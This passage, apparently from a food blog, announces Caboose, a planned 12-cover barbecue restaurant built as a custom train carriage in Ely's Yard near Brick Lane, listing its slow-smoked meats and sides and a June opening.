that? What’s that? A new street food ‘restaurant’ serving slow-smoked barbecue opening in Ely’s yard, just adjacent to Brick Lane called Caboose. Sure is! A caboose is the last carriage on an old train where the workers chilled out and ate and these guys are building their very own custom made caboose, with an indoor dining area in the back.

A cross between a market stall and permanent restaurant the space will have a cosy ‘log cabin’ feel about it with just 12 covers. Expect 10-12 hour slow smoked Beef Brisket, 12-14hr smoked Pork Shoulder, Pork Ribs, Pork Belly, Beef Ribs and slow cooked Hogget. On the side will be the likes of smoked aubergine, haloumi-stuffed red pepper and bone marrow mash-potato as well as big hearty salads. The opening date is set for June but we’ll keep you posted.
